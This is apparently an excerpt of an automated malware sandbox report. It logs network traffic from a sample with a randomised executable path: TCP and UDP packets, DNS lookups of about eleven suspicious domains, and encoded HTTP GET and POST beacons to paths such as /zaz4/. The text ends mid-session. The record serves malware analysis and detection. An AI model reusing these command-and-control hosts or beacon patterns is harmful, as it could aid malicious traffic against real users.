                                                          Jan 16, 2025 09:25:38.419785976 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:38.419873953 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.429352045 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:38.434222937 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.016755104 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.016882896 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:39.017009020 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:39.019680023 CET4999180192.168.2.5199.192.21.169
                                                          Jan 16, 2025 09:25:39.024534941 CET8049991199.192.21.169192.168.2.5
                                                          Jan 16, 2025 09:25:44.524581909 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.529557943 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:44.529642105 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.545206070 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:44.550307989 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120225906 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120439053 CET8049992154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:45.120603085 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:46.051808119 CET4999280192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.076698065 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.081621885 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.081747055 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.103009939 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:47.107878923 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652390003 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652499914 CET8049993154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:47.652543068 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:48.614363909 CET4999380192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.632751942 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.642426014 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:49.645761967 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.660794973 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:49.670679092 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:49.675451994 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221178055 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221312046 CET8049994154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:50.221410036 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:51.179836988 CET4999480192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.195856094 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.200844049 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.200983047 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.210787058 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.215698004 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.794837952 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.795145035 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:25:52.795248985 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.797828913 CET4999580192.168.2.5154.197.162.239
                                                          Jan 16, 2025 09:25:52.803010941 CET8049995154.197.162.239192.168.2.5
                                                          Jan 16, 2025 09:26:06.773806095 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.778640985 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:06.778785944 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.792810917 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:06.797604084 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657269955 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657386065 CET8049996134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:07.657469034 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:08.301805019 CET4999680192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.320663929 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.325664997 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:09.325733900 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.338294983 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:09.343137026 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214730024 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214792013 CET8049997134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:10.214880943 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:10.848747969 CET4999780192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.867070913 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.872096062 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:11.872272968 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.889775038 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:11.896646023 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:11.896678925 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.768207073 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.768979073 CET8049998134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:12.769081116 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:13.395941019 CET4999880192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.413959980 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.419573069 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:14.419688940 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.428988934 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:14.435056925 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294491053 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294565916 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:15.294724941 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:15.298520088 CET4999980192.168.2.5134.122.133.80
                                                          Jan 16, 2025 09:26:15.303358078 CET8049999134.122.133.80192.168.2.5
                                                          Jan 16, 2025 09:26:20.334436893 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.341845036 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:20.341918945 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.353866100 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:20.361665964 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783191919 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783318996 CET805000047.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:21.783375978 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:21.864491940 CET5000080192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.888202906 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.893692017 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:22.893779039 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.909233093 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:22.914554119 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.350336075 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.350972891 CET805000147.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:24.351039886 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:24.411233902 CET5000180192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.430831909 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.435755014 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:25.435926914 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.452495098 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:25.457415104 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:25.457506895 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:26.958055973 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:26.963185072 CET805000247.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:26.963258028 CET5000280192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.976331949 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.981508017 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:27.981590986 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.991368055 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:27.996300936 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598229885 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598293066 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:29.598381042 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:29.601063967 CET5000380192.168.2.547.83.1.90
                                                          Jan 16, 2025 09:26:29.605915070 CET805000347.83.1.90192.168.2.5
                                                          Jan 16, 2025 09:26:34.637084007 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.642014980 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:34.642101049 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.657100916 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:34.661956072 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237520933 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237584114 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.237672091 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:35.238478899 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.238512039 CET8050004188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:35.238563061 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:36.161351919 CET5000480192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.180171013 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.185236931 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.185345888 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.201065063 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.206046104 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.767164946 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.767225981 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.767416954 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:37.768054008 CET8050005188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:37.768120050 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:38.708204031 CET5000580192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:39.730313063 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:39.735388994 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:39.735474110 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:39.750276089 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:39.755183935 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:39.755268097 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:40.316966057 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:40.317038059 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:40.317110062 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:40.317239046 CET8050006188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:40.317290068 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:41.254983902 CET5000680192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.274840117 CET5000780192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.279828072 CET8050007188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:42.279979944 CET5000780192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.289607048 CET5000780192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.294436932 CET8050007188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:42.842978954 CET8050007188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:42.843137026 CET8050007188.114.96.3192.168.2.5
                                                          Jan 16, 2025 09:26:42.843250036 CET5000780192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.848007917 CET5000780192.168.2.5188.114.96.3
                                                          Jan 16, 2025 09:26:42.852946043 CET8050007188.114.96.3192.168.2.5

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 16, 2025 09:24:33.187076092 CET5365753192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:24:33.204036951 CET53536571.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:24:49.815640926 CET6327253192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:24:49.870174885 CET53632721.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:25:03.555561066 CET5226653192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:25:03.567045927 CET53522661.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:25:16.946171045 CET5226753192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:25:17.186825037 CET53522671.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:25:30.745081902 CET6261153192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:25:30.756715059 CET53626111.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:25:44.025285006 CET5913653192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:25:44.522073030 CET53591361.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:25:57.805419922 CET6273353192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:25:57.815109015 CET53627331.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:26:05.868031979 CET6016853192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:26:06.771419048 CET53601681.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:26:20.305088043 CET6100853192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:26:20.332423925 CET53610081.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:26:34.617535114 CET5329453192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:26:34.634727955 CET53532941.1.1.1192.168.2.5
                                                          Jan 16, 2025 09:26:47.852269888 CET6098553192.168.2.51.1.1.1
                                                          Jan 16, 2025 09:26:47.862433910 CET53609851.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 16, 2025 09:24:33.187076092 CET192.168.2.51.1.1.10xce74Standard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:24:49.815640926 CET192.168.2.51.1.1.10x796aStandard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:03.555561066 CET192.168.2.51.1.1.10x4e0dStandard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:16.946171045 CET192.168.2.51.1.1.10xe4efStandard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:30.745081902 CET192.168.2.51.1.1.10x3feStandard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:44.025285006 CET192.168.2.51.1.1.10xcc3bStandard query (0)www.investshares.netA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:57.805419922 CET192.168.2.51.1.1.10x32c9Standard query (0)www.nosolofichas.onlineA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:05.868031979 CET192.168.2.51.1.1.10x74bStandard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:20.305088043 CET192.168.2.51.1.1.10x1e45Standard query (0)www.adadev.infoA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:34.617535114 CET192.168.2.51.1.1.10x6be7Standard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:47.852269888 CET192.168.2.51.1.1.10x1098Standard query (0)www.ebsmadrid.storeA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 16, 2025 09:24:33.204036951 CET1.1.1.1192.168.2.50xce74No error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:24:49.870174885 CET1.1.1.1192.168.2.50x796aNo error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 09:24:49.870174885 CET1.1.1.1192.168.2.50x796aNo error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:03.567045927 CET1.1.1.1192.168.2.50x4e0dNo error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:03.567045927 CET1.1.1.1192.168.2.50x4e0dNo error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:17.186825037 CET1.1.1.1192.168.2.50xe4efNo error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 09:25:17.186825037 CET1.1.1.1192.168.2.50xe4efNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:17.186825037 CET1.1.1.1192.168.2.50xe4efNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:30.756715059 CET1.1.1.1192.168.2.50x3feNo error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:44.522073030 CET1.1.1.1192.168.2.50xcc3bNo error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:25:57.815109015 CET1.1.1.1192.168.2.50x32c9Name error (3)www.nosolofichas.onlinenonenoneA (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:06.771419048 CET1.1.1.1192.168.2.50x74bNo error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 16, 2025 09:26:06.771419048 CET1.1.1.1192.168.2.50x74bNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:06.771419048 CET1.1.1.1192.168.2.50x74bNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:20.332423925 CET1.1.1.1192.168.2.50x1e45No error (0)www.adadev.info47.83.1.90A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:34.634727955 CET1.1.1.1192.168.2.50x6be7No error (0)www.cifasnc.info188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:34.634727955 CET1.1.1.1192.168.2.50x6be7No error (0)www.cifasnc.info188.114.97.3A (IP address)IN (0x0001)false
                                                          Jan 16, 2025 09:26:47.862433910 CET1.1.1.1192.168.2.50x1098Name error (3)www.ebsmadrid.storenonenoneA (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.gayhxi.info
                                                          • www.promocao.info
                                                          • www.grimbo.boats
                                                          • www.44756.pizza
                                                          • www.lonfor.website
                                                          • www.investshares.net
                                                          • www.jrcov55qgcxp5fwa.top
                                                          • www.adadev.info
                                                          • www.cifasnc.info

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.54991547.83.1.90803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:24:33.237374067 CET483OUTGET /k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.gayhxi.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:24:34.697711945 CET139INHTTP/1.1 567 unknown
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:24:34 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.54997584.32.84.32803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:24:49.979055882 CET743OUTPOST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 74 65 41 35 69 76 33 4c 65 4b 6e 54 61 5a 4e 73 42 56 63 79 69 5a 76 53 4e 55 45 56 54 70 63 30 51 67 46 4f 51 34 3d
                                                          Data Ascii: R4Stj2k=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvteA5iv3LeKnTaZNsBVcyiZvSNUEVTpc0QgFOQ4=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.54997684.32.84.32803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:24:52.649607897 CET763OUTPOST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 31 58 43 65 63 7a 45 6a 49 31 75 7a 77 31 51 48 76 64 78 70 59 73 4b 7a 32 76 34 6f 67 4d 5a 4a 71 35 54 7a 79 56
                                                          Data Ascii: R4Stj2k=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC1XCeczEjI1uzw1QHvdxpYsKz2v4ogMZJq5TzyV


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.54997784.32.84.32803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:24:55.375016928 CET1780OUTPOST /zaz4/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.promocao.info
                                                          Origin: http://www.promocao.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.promocao.info/zaz4/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
